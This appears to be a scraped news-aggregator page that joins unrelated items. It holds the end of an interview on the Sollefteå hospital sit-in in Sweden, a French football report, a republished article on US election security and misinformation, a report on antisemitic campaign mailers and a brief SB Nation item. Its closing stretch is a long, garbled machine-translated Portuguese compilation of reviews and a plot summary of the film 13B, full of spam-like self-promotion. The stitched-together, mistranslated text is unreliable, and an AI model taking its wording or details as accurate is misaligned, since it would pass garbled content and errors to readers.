BK: Before the 9 September election this year, the movement had a number of seminars asking the political parties about their stands on this issue. Every party had to make their position on Sollefteå hospital clear. The outcome was up for those supporting the hospital issue, very much down for those sticking to the need of saving money and keep Sollefteå hospital capacity down.

FS: What is the movement’s implication in society, politics, culture and organisation?

BK: There is a lot of support at national level. The Occupy Movement/sit-in is known all over the country although many big city dwellers cannot put Sollefteå on a Sweden map. Local companies are supporting with fruit-baskets, coffee-machine, television-set, etc. An exhibition about giving birth in cars on way to far away maternity wards was held. Many radio and television programmes and debates about the issue have been broadcast/telecast.

I would like to present a perspective to the scene: 

A lot of regional, as well as national and local (municipality), level politics is how to restrict tax-financed activities, how to save money, and how to stick to budget. It is widely propagated. To be “responsible” is to be very strictly sticking to budget. A “successful” leadership is managing to use less money than budgeted, all this in tax-financed activities. Tax income for all three administration-levels has decreased heavily after the eight years of neo-liberal rule. They “reformed” the taxation system five times, “more money in your purse”, leading to vast holes in the tax-financed sector. This is the main reason behind the lack of resources for the public sector.

The new-liberal era has introduced private actors in the health, elderly care and education sectors. It is called “freedom of choice”. This means that the big city can offer dozens of alternatives within each of the sectors while the only health clinic in rural centres is wiped out. Market has taken over from need and legal right.

The Social Democrats, the Greens and the Left try to minimise the profit level of private education companies (called Free Schools in Sweden, another example of new-liberal word washing, as a more accurate term would be profit-seeking schools) in the parliament. A maximum of annual 7 percent profit was their proposal. This was called communism in one of the big dailies (perhaps we have to find out what communism is actually about). They were voted down in the parliament.

Nowadays, private companies are well established within the health sector. Modern capitalism has very successfully entered the scene of tax-financed sectors, a fresh area to make profits. Private recruiting companies are buying doctors and nurses. When regional hospitals cannot recruit (as the doctors and nurses have already listed themselves with the private recruiting companies), they are forced to turn to the recruiting companies. It becomes expensive. There are examples of doctors cutting gold as rented professionals, rented nurses earning two-three times more than the regular staff with long experience. The main reason for the region having enormous budget deficit is their bills for rented professionals. It is part of the new-liberal success-story. However, it is expensive for the taxpayers.

Thank you for the interview.

 

* Bosse Kramsjo was a faculty member in a development studies related institute run by the Swedish government. 

*Farooque Chowdhury is a freelancer from Dhaka, Bangladesh, who recently interviewed Bosse. 

Notes: 

1) The distance between Sollefteå and Stockholm is some 500 km, the distance between Sollefteå municipality and the regional main hospital in Sundsvall is about 150 km. Maria, and Bosse live 30 km east of Sollefteå town.

2) www.adalen2017.seand similar searches carry information and photos of the Occupy Movement.

Issue Number: 

          Ligue des champions: Paris manque l'exploit à Naples mais sauve ses chances de qualification      Cache   Translate Page      
L'enfer promis du San Paolo a failli se transformer en paradis : le Paris SG, incapable de profiter de la défaite de Liverpool en concédant le nul sur le terrain de Naples (1-1) mardi soir, reste troisième du groupe "de la mort" de la Ligue des champions. "Le plus important encore, c'est d'abord de ne pas perdre parce que nous aurons encore la possibilité de gagner contre Liverpool et l'Etoile Rouge de Belgrade": les mots de l'expérimenté Gianluigi Buffon ont été prophétiques. Si Paris n'a pas dilapidé ses chances de qualification, son prochain match contre Liverpool, le 28 novembre, sera une "finale" à quitte ou double.
          Information Warfare and Security Flaws: Why the American Voting System Is Still at Serious Risk      Cache   Translate Page      
As this election’s results come back, they will reveal whether the misinformation and propaganda campaigns conducted alongside the political ones were effective.

As the 2018 midterms proceed, there are still significant risks to the integrity of the voting system – and information warfare continues to try to influence the American public’s choices when they cast their ballots.

On the day of the election, there were a number of early hitches in voting at individual polling places, such as polling places opening late and vote-counting machines not plugged in. But there seem not – at least not yet – to be major problems across the country.

However, not all the election-related news and information voters have been encountering in recent days and weeks is accurate, and some of it is deliberately misleading. As this election’s results come back, they will reveal whether the misinformation and propaganda campaigns conducted alongside the political ones were effective.

Securing election systems

America’s electoral process remains highly fragmented, because of the country’s cherished tradition of decentralized government and local control. While this may leave some individual communities’ voting equipment potentially vulnerable to attack, the nation’s voting process overall may be more trustworthy as a result of this fragmentation. With no unified government agency or office to provide, administer and protect election technologies, there’s not one central national element that could fail or be attacked.

Across the country, though, many districts’ voters will cast ballots with the help of machines that have long-standing security concerns. Fortunately, 45 states keep a paper record of each vote cast – whether for fear of threats to voting integrity or just budget constraints preventing purchase of newer gear. But that means five states – Louisiana, Georgia, South Carolina, New Jersey and Delaware – don’t keep paper records of their voters’ choices.

Voting machine vendors have been reluctant to appear before Congress to explain their systems’ security practices – and shortcomings. However, federal agencies have helped some states reduce the likelihood of voting machines being hacked or physically tampered with.

Beyond voting machines

Election security is about much more than voting machines and vote-counting systems, though they are the most visible technologies at work on Election Day. State systems that track voter registrations, or allow users to register online, are enticing targets for hackers, too. Security firm Carbon Black reported that 81 million voter records from 20 states are available in online forums. This data, obtained by hacking various official and corporate databases, could be used to facilitate voter fraud or sow confusion at polling places on Election Day: How would you feel if you were told that someone using your name and address had already voted?

There are security concerns even in states like Oregon, where everyone votes on paper and mails in their ballots in advance of Election Day. That state’s election officials were targeted by hackers seeking to gain access to state email and database systems. With that access, attackers might be able to digitally impersonate a government official to send false or confusing emails, press releases or other notifications to citizens, journalists or poll workers.

Also at risk are public-facing official websites that carry election information. Merely changing the reported location of polling places or voting hours could prevent some people from voting. Also vulnerable are states’ methods of announcing preliminary election results. At a major internet security conference in August, children were able to compromise replicas of several states’ election-reporting systems. The most remarkable was that in just 10 minutes, an 11-year-old boy cracked the security on a copy of the Florida secretary of state’s website and was able to change the publicly announced vote totals for candidates. That could be enough to cast doubt on whatever was later reported as the official results – and the integrity of the system itself.

Managing information on social media

A more difficult threat to defend against is information warfare, which doesn’t attack voting machines or election officials’ computers. Rather, it targets voters’ perceptions and decisions, seeking to influence how they vote.

Long before the 2016 U.S. presidential election, information warfare was influencing elections around the world, including in Ukraine, Myanmar and Egypt. But after 2016, Facebook and Twitter came under intense scrutiny for their role in providing digital environments that facilitated the spread of misinformation to sow discontent, and special counsel Robert Mueller began investigating Russians’ influence efforts.

In the run-up to the 2018 midterms, Russians and others were still hard at work trying to influence Americans to vote in ways that help foreign interests. In October, the U.S. Department of Justice charged a Russian woman with creating thousands of fake social media accounts allegedly representing American citizens to “create and amplify divisive social media and political content” before the election.

This year, though, unlike two years ago, social media companies are taking action. Twitter and Facebook have both deleted thousands of accounts they identified as engaging in propaganda and influence-peddling. And they have made other efforts to identify and fight falsehoods on their platforms, too.

Nevertheless, online misinformation continues to thrive. More than 80 percent of the Twitter accounts that often shared links to false and misleading information in 2016 are still active today. And the amount of online misinformation is higher than it was two years ago.

Investigating alleged wrongdoing

U.S. intelligence and police agencies are concerned about the potential effects of misinformation on the American electorate. But large proportions of the country don’t trust those organizations to be politically independent. It doesn’t help that the White House continues to claim, without evidence, that voter fraud is a significant problem.

Mainstream news organizations can find themselves under scrutiny too, either for reporting falsehoods that appear to gain traction online or for failing to filter out or properly identify inaccurate information for their readers.

Looking ahead

Protecting democracy is a huge challenge. I’ve written before that it involves more than technical solutions to computer problems. The U.S. government, and the people it serves, must find the desire and the drive to establish secure and trustworthy procedures for running elections across the country. Education is also key, teaching people from an early age how to recognize propaganda and misinformation, and think critically about the information they encounter. Facts are not subject to alternative views; without widespread agreement on common objective realities, society and government cannot function well.

Technology continues to evolve, presenting challenges to individuals and society alike. Emerging “deepfake” technology is already helping create convincing videos of people appearing to say and do things they never said or did. In addition, intelligent social media bots are becoming more human-like, making identifying and blocking them much more difficult. That’s just some of the challenges that democracies will face in the future.

Many of these problems will not have a clearly defined fix, because they involve a nuanced balancing of individual rights and social necessities. Real and lasting solutions must come from civil discourse by rational and objectively informed people who have, above all, the actual honest desire to do it right.

Richard Forno, Senior Lecturer, Cybersecurity & Internet Researcher, University of Maryland, Baltimore County

This article is republished from The Conversation under a Creative Commons license. Read the original article.

 

Related Stories


          GOP Candidates Face Outcry For Depicting Jewish Opponents Clutching Fistfuls of Cash      Cache   Translate Page      
The GOP isn't even trying to be subtle about it anymore.

The dust has barely settled from the horrific Tree of Life shooting in Pittsburgh, committed by a neo-Nazi who believed Jewish groups are funding an influx of nonwhite migrants into the United States for nefarious purposes.

But Republicans apparently feel no responsibility to stand up to anti-Semitic sentiment. On the contrary, many GOP candidates are exploiting age-old stereotypes to attack Jewish opponents as avaricious and money-grubbing.

On Tuesday, with the polls opening nationwide, the Washington Post detailed multiple instances around the country of Republicans who have gone after Jewish Democrats by depicting them clutching fistfuls of cash.

One ad in Alaska depicted a Jewish state Senate candidate as a shadowy figure stuffing $100 bills into his suit, captioned "If you give Jesse Keihl your vote, you may as well give him your wallet." Republicans in Washington's 8th District illustrated the Democratic candidate, Dr. Kim Schrier, clutching a wad of $20 bills with the line "Dr. Tax will see you now!"

Another mailer in North Carolina showed Senate Democratic Leader Chuck Schumer with a stack of bills, while a GOP state assembly candidate in California showed challenger Josh Lowenthal tinted green and clutching $100s, and the Connecticut Republican state Senate candidate put out an attack against opponent Matthew Lesser showing him grasping a wad of cash with a bug-eyed, demonic grin.

The anti-Semitic attacks are getting so grotesque that even some Republicans are sickened. "Jesse is proudly and prominently a member of Juneau's Jewish community," said Scott Kendall, a Jewish Republican who served as chief of staff to outgoing Gov. Bill Walker. "It is tough for me to process through that and not see an ill intent."

The stereotype of the Jewish people as money-grubbing and usurious dates back centuries, originating from Roman and medieval Church depictions of Judas' betrayal of Christ for thirty pieces of silver. It has been used to justify horrific persecution of Jews — a key fixture of Nazi propaganda was that the postwar German economy was suffering because Jews had bled the nation of all its money.

But Republicans have been increasingly willing to lean on this poisonous imagery for political ends. In 2016, the Trump campaign shared an image of Hillary Clinton depicting her on a pile of cash with a Star of David, an image first posted on an anti-Semitic message board (Clinton is a Methodist).

More recently, they have sought to tie the Honduran migrant caravan to George Soros, a Jewish Hungarian-born philanthropist billionaire and Holocaust survivor known for his contributions to liberal causes.

 

Related Stories


          SB Nation Wrongly Told Two Writers They Couldn't Get Paid Because They Are Under 18      Cache   Translate Page      

A manager from SB Nation, a network of sports blogs that continues to profit off the labor of unpaid and underpaid workers, recently told two writers who are still in high school that they could not be paid for their work because they are under the age of 18.

Read more...


          13B Audio Songs SITES and BLOGS LUIZA Goianápolis BOLLYWOOD MUSIC and MOVIES 2013.http://musicmazaa.com/ Starring :Madhavan R, Murli Sharma, Neetu Chandra, Poonam Dhillon, Sachin Khedekar Music :Shankar-Ehsaan-Loy Director :Vikram K Kumar Producer :Big Pictures MY NAME: LUIZA. I LIVE IN CITY :GOIANAPOLIS-GOIAS-BRAZIL. SEARCH NAMES OF MY BIOGRAFY TO SEE MY SITES IN GOOGLE. GOOGLE SEARCH FOR: LUIZA GOIANAPOLIS      Cache   Translate Page      

Listen to 13B Audio Songs at MusicMazaa.com
13B Audio Songs SITES and BLOGS LUIZA Goianápolis BOLLYWOOD MUSIC and MOVIES 2013. Starring :Madhavan R, Murli Sharma, Neetu Chandra, Poonam Dhillon, Sachin Khedekar Music :Shankar-Ehsaan-Loy Director :Vikram K Kumar Producer :Big Pictures Aasma Odh Kar Chithra KS, Shankar Mahadevan Sab Khairiyat Hai (Remix) Shankar Mahadevan Bade Se Shehar Mein Kartik Theme ShankarMahadevan Sab Khairiyat Hai Shankar Mahadevan Aasma Odh Kar (Remix) Chithra KS, Shankar Mahadevan Oh Sexy Mama (Remix) Anushka Manchanda, Baba Sehgal, Loy Bade Se Shehar Mein (Remix) Kartik Oh Sexy Mama Anushka Manchanda, Baba Sehgal, Loy Filme comentário: 13 J-horror de estilo thriller sobrenatural da Índia não tem o sangue ou a intensidade da coisa real, e para muitos no mainstream, que é um alívio. De baixo orçamento para o futuro, mas eficaz, com uma jogada de grande central. 6 de março de 2009 Para detalhes do filme, clique aqui. Tomando um taco de seus vizinhos asiáticos, o índio sobrenatural suspense 13B combina o pavor terror doméstico de horror japonês e seus irmãos-tudo coreanas e tailandesas para baixo o alfabeto de J-horror a K-horror para a T-horror-com bege / marrom , desbotada, cinematografia 1970-estilo. O resultado é um híbrido inquietante, no melhor sentido: Atormentado como é por um olhar de baixo orçamento e um bando de tropos de suspense, este primeiro longa-metragem falado em hindi pelo escritor-diretor Vikram K. Kumar (cujos 10 minutos de "Silent Scream "ganhou, de todas as coisas, o Prêmio de seu país Nacional de Cinema de Melhor Educacional / inspirador Cinema / Instrucional em 1999) fornece calafrios fantasmagóricos de forma eficaz e com um conceito maravilhosamente original. Engenheiro civil Mannu Manohar (o ator bem-visto e ativista Madhavan Ranganathan) acaba de se mudar com sua família para um apartamento deee-luxe no céu-ai-ai. Ele e seu irmão Manoj, um colega de profissão, pode ter sobrecarregado a si mesmos, mas seu apartamento duplex 13B é um oásis modernista para eles e sua mãe (Poonam Dhillon); seu colegiado irmã Divya; esposa Mannu de Priya (Neetu Chandra) e esposa Manoj do e dois filhos jovens. O elevador não parece funcionar quando Mannu quer levá-la, mas hey, é um edifício novo e alguns erros precisam ser trabalhados. Então, fazer um monte de outras coisas, como isso acontece. Fotos tiradas no celular Mannu de sair torcida e grotesco quando tiro no apartamento, e em nenhum outro lugar. O vizinho velho cego grandes grandes protetores choraminga cachorro como um cachorro assustado no limiar do apartamento. E as irmãs-de-lei e mamãe começar a assistir uma novela, "Sab Khairiyat" ("está tudo bem"), que vai ao ar às 13:00 horas no canal 13 no apartamento de 13 apenas, como Mannu descobre para seu horror crescente. Que só se intensifica quando o espelho família e eventos na tela a sua própria quase exatamente, com um verniz quase ficcional. Quando a novela começa retratando terríveis tragédias que começam tornando realidade, Mannu torna-se encorajada o suficiente para contar a sua velha amiga, a polícia sub-inspector Shiva (Murli Sharma), e para visitar médico da minha mãe, Balram Shinde (Sachin Khedekar), cujo no trabalho extremis levou-o a acreditar no paranormal. Busca cada vez mais obsessivo Mannu para a raiz do que está ocorrendo e leva Shiva para desenterrar, literalmente, como acontece-detalhes de um terrível assassinato em massa de uma família neste site mesmo edifício em 1977. O aparelho de TV é o seu meio, eo programa é a sua mensagem de tipo de. Por que o poder-que-ser fazer o que eles fazem não faz qualquer sentido em retrospecto, mas Kumar vivo e sabendo maneira com este tipo de história faz toda a deslizamento que, como você vê um homem decente, normal suspensefully cair mais e mais no inferno por não por culpa própria. Duas baladas unexceptional pela equipe de estrelas composição de Shankar-Ehsaan-Loy jogo sobre montagens de família, mas há uma canção kick-ass sobre o fim créditos-a completamente incongruente "Mama Oh Sexy", em que Madhavan, Chandra e muitos bump-e -moer belezas em PVC curto-shorts girar para um número de dança que teria feito Robert Palmer orgulhoso. Muito raramente, talvez sem precedentes desde os dias de talkies iniciais, o filme foi rodado em duas versões simultaneamente, com o mesmo elenco em sua maioria, em dois idiomas, com a Yavarum Tamil Nalam eo Hindi 13B sendo liberado no mesmo dia. (Kumar já trabalhou nas línguas tamil e telugu.) Embora os filmes Tamil são muitas vezes refeito em hindi, este maximização de séries e atores não parece acontecer muito, se em tudo. Incomum em um sentido ruim são os gráficos de legenda pobres, Luiza Goianápolis Diretor: Vikram K. Kumar Banner: Big Pictures Música Diretor: Shankar Mahadevan, Ehsaan Noorani, Loy Mendonsa Letrista: Neelesh Misra Estrela Elenco: R. Madhavan, Neetu Chandra, Sachin Khedekar, Murli Sharma, Poonam Dhillon, Murli Sharma, Deepak Dobriyal, Dhritiman Chatterjee Data de lançamento: 06 de março de 2009 Se você estiver procurando por um filme de suspense, que irá mantê-lo na borda de seu assento o tempo todo, então 13 pode ser apenas o filme para você. Com base em uma trama inovadora, que (felizmente!) não envolve o uso de rostos de aparência repugnante fantasmas, Babas psico ou movimentos de câmera excessivos, 13B impressiona em um número de pontos. Uma das primeiras coisas que atingem você é que a configuração de toda a história é bastante compreensível e traz horror no curso normal dos acontecimentos apenas. Não há uma visita a um 'Purani "(velho) haveli ou indo a algum lugar sozinho, na calada da noite, para os eventos assustadores para acontecer.   Vikram K. Kumar toma todo o crédito para mantê-lo viciado em, com a sua direcção, bem como seu roteiro e diálogos. Outro aspecto, em que pontuações 13B consideravelmente bem, é que a explicação por trás da ocorrência de estranho, você também pode dizer sobrenatural, eventos é bastante convincente. Mesmo a pontuação do fundo adiciona ao horror. Há certas falhas no filme, como a sua longa duração (que poderia ter sido editado um pouco mais) ea música de sonho entre Madhavan e Neetu (totalmente desnecessário). No entanto, nenhum deles é ruim o suficiente para afetar negativamente o filme, em grande medida.   Falando sobre performances, Madhavan é o primeiro nome que vem à mente. Suas expressões lindamente transmitir a terrível confusão e pânico seu personagem está passando. Quanto Neetu Chandra, ela é vista em um avatar 'menos maquiagem "e dá um bom suporte para Madhavan. Murli Silva é outro personagem que consegue impressionar-nos, especialmente com o seu timing perfeito quadrinhos. Poonam Dhillon, visto em filmes depois de um longo tempo, não perdeu seu toque. Mesmo Sachin Khedekar e Deepak Dobriyal foram bons em seus respectivos papéis. Você não se arrependerá de gastar dinheiro e assistindo 13B em um multiplex!    13 Revisão de Pré-lançamento Depois de 'Raaz - O mistério continua ", prepare-se para testemunhar outro filme baseado no gênero de terror - '13B'. Dirigido por Prémio Nacional de ganhar diretor - Vikram K. Kumar, o filme tem R. Madhavan e Neetu Chandra nos papéis principais, apoiado por Sachin Khedekar, Sharma Murli, Dhillon Poonam, Sharma Murli, Dobriyal Deepak e Chatterjee Dhritiman. Ele tem o famoso trio de Shankar-Ehsaan-Loy fornecer a música, as letras das Neelesh Misra. O filme será lançado no dia 6 de março de 2009, em "Big Pictures" a bandeira.   Um thriller sobrenatural, '13B 'foi localizado no meio de um cenário urbano e gira em torno da vida de Manohar (R. Madhavan), sua esposa Priya (Neetu Chandra) e seus familiares. Manohar é Engenheiro Civil de trabalho duro, que é de 31 anos de idade e muito bem casado. Um homem urbano típico indiano, suas preocupações principais na vida incluem o fornecimento de sua família com todas as comodidades, contados necessário para levar uma vida confortável. Ele é racional em seus pensamentos e práticas em sua abordagem, com uma mente analítica e dobrado pensamento claro.  Priya Manohar esposa representa uma dona de casa dia típico moderno, que é extremamente favorável de seu marido. Como a maioria das donas de casa nos tempos atuais, ela também é apaixonada por novelas diárias que vêm na TV. Ela é uma dedicada filha-de-lei, um amoroso irmã-de-lei e uma tia, brincalhão atencioso. A vida de Manohar e Priya está se movendo de forma harmoniosa e agora, eles estão ansiosos para ter uma família própria, tentando ter um filho. Manohar muda de casa e se muda para um novo apartamento, com sua família.   Numerada 13B, Manohar apartamento é no 13 º andar de um edifício. Logo, eles se contentar em casa, onde as mulheres encontrar um novo amor - assistindo o show mais recente TV'' Sab Khairiyat'' (Tudo está bem). Curiosamente, a família no show é bastante semelhante ao de Manohar. Inicialmente, uma série de coisas boas lugar no show e eventos semelhantes ocorrem em família Manohar também. No entanto, em breve, as coisas tomam um rumo para o pior. Será que os incidentes chocantes visto no show afetar Manohar e sua família também? Por que isso está acontecendo? Manohar vai ser capaz de resolver o mistério antes que seja tarde demais? As respostas não são muito longe! Manohar, uma ascensão movimentos de classe média da Índia em um novo apartamento - 13B no 13 º andar com sua família. Desde o primeiro dia em sua nova casa, as mulheres estão agarradas a um novo programa de TV 'Sab Khairiyat' (Tudo Está Bem). O show é sobre uma família estranhamente semelhante à deles, que também acabou de se mudar para uma nova casa. Como o programa de TV se desenvolve, todos os incidentes que acontecem no show começam a acontecer a Manohar e sua família. Inicialmente, uma série de acontecimentos felizes acontecem e um monte de coisas boas acontecem, tanto no show e com a família de Manohar. Então, as coisas tomam um rumo para o pior e incidentes chocantes começam a acontecer na série de TV ... Será que o mesmo acontecerá com Manohar e sua família? Manohar vai ser capaz de resolver o mistério a tempo, antes que consome ele e toda a sua família? Filme: 13 (Horror) Elenco: R. Madhavan, Neetu Chandra, Sachin Khedekar Direção: Vikram Kumar K Duração: 2 horas e 25 minutos Avaliação Crítica:    Agora este é um goosebump pouco nítidas que mantém o fator de resfriamento em lume brando, tanto em termos de conteúdo e carisma (leia estilo). Geralmente, filmes de terror desi acabar baixo na história e se desintegrar no clímax, relegando o suspense e gore para alguns Mumbo-jumbo sobre bruxaria e vodu. Raramente eles vêm com uma explicação satisfatória para toda a sabedoria bhoot o paranormal na tela, antes de as bobinas de fechamento. Mas esse não é o caso com 13B. Por um lado, ele mantém a cerveja elemento susto durante a maior parte do filme, com o perigo ea morte espreita a cada esquina torcida. Por outro lado, ele combina o supra-normal com o normal, para dar-lhe uma razão plausível para todas as ocorrências estranhas na tela. Mais importante, ele faz uma escavação tópico sobre a obsessão global do século 21: o onipresente - influência da televisão, que parece ter tomado completamente sobre nossas vidas - e curiosos. E se isso não é uma advertência forte o suficiente estatutária, a caixa de idiota inofensivo pode em breve ser substituído pelo móvel inimigo como um dispositivo de sanidade em risco, conclui. Especialistas já estão afirmando que 53 por cento dos usuários de telefonia móvel estão sofrendo de nomophobia, (sem fobia móvel) um medo de estar sem seu celular. Então lá! 13 começa com uma nota alegre. Uma família feliz, que passa a ser um microcosmo do Parivar Great Indian, se muda para um novo apartamento, que foi comprado por dois irmãos (Madhavan e cia.) Após sofrer um empréstimo robusto. Os irmãos ascensão não se importa e começar o dia com uma nota alegre, com as esposas (Neetu Chandra e cia.) Alegremente fofocando na cozinha, as crianças ruidosamente se preparando para a escola e faculdade e da mãe (Poonam Dhillon) afavelmente clamando para uma conexão a cabo, uma vez que ela não pode suportar perder um único episódio de seus saas-Bahu sabonetes. Imagem perfeita, você disse? Bem, quase. Assim que o leite coalhado fica todos os dias, os retratos dos deuses não podem ser pendurados nas paredes impenetráveis, o elevador não funciona apenas para Madhavan, sua câmera de celular implacavelmente distorce o rosto e o cachorro do vizinho misterioso simplesmente se recusa a entrar no apartamento com seu mestre. Razão suficiente para Madhavan racionalista de pressionar o botão de pânico? Não até que inesperadamente encontra uma telenovela que parece estar a jogar somente em sua casa e na tela o drama acaba prevendo os eventos que gradualmente começam a atormentar a família feliz. Escusado será dizer, o sabão é extremamente popular com as mulheres em sua casa, até que o sangue começa a fluir .... E a única maneira Madhavan pode proteger a sua família é, tornando-se um viciado em TV a si mesmo e aprender o que está na loja. É um conto interessante, bem contada, com todas as voltas e voltas obrigatórias em todos os lugares certos. Adicionando a isso, é a espontaneidade completa do elenco, habilmente conduzida por Madhavan que é extremamente cativante como o yuppie, dividido entre o sobrenatural eo real. Cuidado com alguns cinematografia zippy, um tom estilizado preto e branco e algumas edições snazzy. Timepass grandes. Vá em frente. Luiza Goianápolis 13 Movie Review Diretor: Música: Letra: Estrelando: Vikram K.Kumar  Shankar-Ehsaan-Loy  Neelesh Misra  R. Madhavan, Neetu Chandra, Sachin Khadekar, Murli Sharma e Poonam Dhillon. Há um assassino na casa na calada da noite. Ele está batendo a televisão na sala de estar e não uma das pessoas que dormem em é perturbado. E este é o 13 º andar de um arranha-céu, não algum bangalô palaciano. Não há nenhuma conexão com a família que vive no mesmo apartamento com a dos espíritos incomodando eles. Há apenas um fio tênue e mesmo isso não é suficiente para justificar a estranha semelhança com o número exato de mortos para os que vivem no apartamento. De repente, do nada, duas músicas são forçados na tela, sem rima nem razão. A desnecessário enorme para empurrão no roteiro. Check-out: 13 - Novas fronteiras de Cinema fazer Estas são apenas algumas falhas do chamado diretor Vikram Kumar assustar-fest. Sim, o filme se arrasta demais, assim como uma série de televisão que colabora na tela pequena para justificar os acontecimentos no grande. Confuso, não? Em suma, Madhavan e seu irmão tomar um empréstimo conjunto para se mudar para seu novo apartamento com sua mãe, irmã, esposa e seus sobrinhos. E coisas estranhas começam a acontecer somente para Madhavan. Não é muito antes de ele percebe que a família de sua série é presa está realmente dizendo a sua vida com antecedência. E aparece apenas em seu aparelho de televisão de 13 horas! Após investigações, ele percebe que houve um bangalô no mesmo terreno onde o prédio está agora que foi chamado 13 B, o número de seu apartamento. Aparentemente, todos os oito membros da família foram espancado até a morte e é o assassino impune. Kumar dá Madhavan a tarefa de obter justiça para as vítimas. Para Neetu Chandra, este tem sido um bom filme, no sentido em que ela fica um carretel bom show. A menina melhorou desde seus dias no sinal de trânsito. Há também que o ator maravilhoso, Deepak Dobriyal. Dê-lhe qualquer papel e ele escava-se no personagem que ele deveria ser. Ele perde a auto para se tornar a parte que ele é suposto ser. Um ator super. Shaurya e DELHI 6 são suas façanhas recentes Quanto ao diretor, ele perdeu completamente a trama Yavarum Nalam Origem: Wikipédia, a enciclopédia livre Yavarum Nalam O Tamil cartaz versão teatral como Yavarum Nalam. Dirigido por Vikram Kumar Produzido por Suresh Balaje George Pio Rajesh Sawhney Escrito por Vikram Kumar Neelu Iyappan Abhinav Singh Kashyap (Diálogos Hindi) Estrelado por R. Madhavan Neetu Chandra Sachin Khedekar Deepak Dobriyal Murli Sharma Dhritiman Chatterjee Sampath Raj Saranya Música por Shankar-Ehsaan-Loy Tubby Parik Cinematografia P. C. Sreeram Edição por SREEKAR Prasad Distribuído por Big Pictures Data de lançamento (s) 6 de março de 2009 Duração 137 minutos País Índia Língua tâmil Hindi Orçamento crore 6 [1] Bilheteria 16 crore (Tamil) 8,1 crore (Hindi) [1] [2] Yavarum Nalam (Inglês: Tudo está bem) é um filme de terror 2009 Tamil psicológico dirigido por Vikram Kumar, estrelado por R. Madhavan e Neetu Chandra nos papéis principais. Produzido por Suresh Balaje e Pio George, o filme foi filmado e lançado simultaneamente em Tamil e também hindi como 13B com um elenco um pouco diferente. Trilha sonora do filme foi composta por Shankar-Ehsaan-Loy e pontuação de fundo por Tubby Parik. O filme foi lançado em 6 de março de 2009 para comentários altamente positivas dos críticos em Tamil e críticas mistas em Bollywood. Conteúdo [hide] 1 Elenco 2 Terreno 3 Produção 3.1 Desenvolvimento 3,2 Fundição 3,3 filmagens 4 Recepção 4,1 Box Office 5 Soundtrack 5,1 Hindi 5,2 Tamil 6 Referências 7 Ligações externas [Editar] Elenco Ator (Tamil versão) Ator (Versão hindi) Papel R. Madhavan Manohar Neetu Chandra Priya Ravi Babu Murali Sharma Siva Sachin Khedekar Dr. Balu / Dr. Shinde Sanjaih Bokaria Manoj Amitha Rajan Deepa Mãe Saranya Poonam Dhillon Manohar de Dhritiman Chatterjee Sr. Kamdhar Deepak Dobriyal Senthil / Ashok Sampath Raj Ramachandran Kushboo Sundar Roshan apresentador de Abbas Rachana Maurya um número de item [Editar] Terreno Manohar, um indiano de classe média alta, move-se para um novo apartamento - 13B no 13 º andar - com sua família, cumprindo um dos maiores sonhos de sua vida. Mas a família é cumprimentado por uma série de pequenos incidentes triviais, como o leite ficar estragado que poderia ser considerado como mau agouro mas minimizou pelo Manohar animado. O elevador no apartamento não funciona para Manohar. As mulheres da família ficar viciado a uma nova TV Yavarum Nalam (todos estão bem, ou Sab Khairiyat na versão hindi). O show é sobre uma família estranhamente semelhante à deles, que também acabou de se mudar para uma nova casa assim como eles têm. Como a série se desenrola, avisos Manohar que os incidentes que acontecem na série são um reflexo do que aconteceu com Manohar e sua família. A série reflete a vida Manohar família. Por exemplo, sua irmã se formar de primeira classe, sua mulher ficar grávida e depois de sofrer um aborto espontâneo. O resto da família permanece alheio às semelhanças e Manohar prefere assim para evitar o pânico. Ele também percebe que a câmera vai tirar fotos de torcidas-lo enquanto ele está no apartamento, mas não enquanto ele está fora do apartamento. Como Manohar combate a sensação desconfortável em sua mente, as coisas começam a tomar um rumo para o pior na série. Ele agora está com medo de que o mesmo poderia acontecer à sua família também. Manohar agora quer saber quem está por trás da realização deste serial e quais são suas intenções. Como Manohar explora os acontecimentos misteriosos, ele desvenda um segredo profundo e profano. A casa em que vivem era a casa onde uma família inteira de oito foram assassinados caminho de volta em 1977. Foi a família de um leitor de notícias chamado TV Chitra. No dia do noivado de Chitra um fã ardoroso (Shriram Shinde na versão 13B) de Chitra queria parar o noivado e ele falhou em fazer isso. Desanimado, ele cometeu suicídio. Posteriormente, todos os membros dessa família foram assassinados com um martelo em um único dia. A culpa descansou no irmão louco na família, como ele havia sido visto com o martelo passado. O policial que investiga o caso, também cometeu suicídio por enforcamento na mesma casa. Agora Manohar e seu amigo, Shiva (Murli Sharma), que é um policial, estão em processo de desvendar o mistério. Manohar investiga o louco Senthil / Ashok, que aparentemente enlouquece depois de ver o programa de TV em um asilo. Manohar então encontra Senthil, que estende a mão para Manohar mas arrasta-lo para dentro, mas seu amigo Shiva o impede de ser arrastado. Eles, então, encontraram o ex Chitra noivo Ramchandar, que tenta defender a inocência Senthil porque ele ficou coberto de sangue enquanto ele abraçou os corpos, não no caso. Depois de pesquisar uma noite, Manohar tem um pesadelo do assassino 13B subir as escadas para matar sua família. Quando Manohar tenta subir as escadas, ele sempre termina no 2 º andar e depois de alguns momentos, ele acorda. Ele, então, vai para a sala e testemunhas o clímax de Yavarum Nalam / Sab Kheriyat quando eles estão mostrando a identidade do assassino, ele vê dois martelos, um martelo e apontou um rombo marreta, em seguida, mostrando a cara Manohar como o assassino. O que se segue é o clímax que amarra todas as pontas soltas. O assassino é o Dr. Balu 13 / Dr Shinde, que vê os rostos dos membros da família como members.It família série foi ele que matou, em 1970, sobre o nome de seu irmão e também matou o policial que o pegou em flagrante. Manohar mata. A história termina com Manohar viver uma vida normal com um novo cão na família, o leite não está ficando mimado mais. Eles trazem Senthil / Ashok casa eo elevador no apartamento finalmente trabalha para Manohar. Manohar recebe um telefonema do Dr. Balu / Shinde Dr enquanto no elevador, que diz que, enquanto a família 13B assombra a TV, ele assombra telefone de Manohar. [Editar] Produção
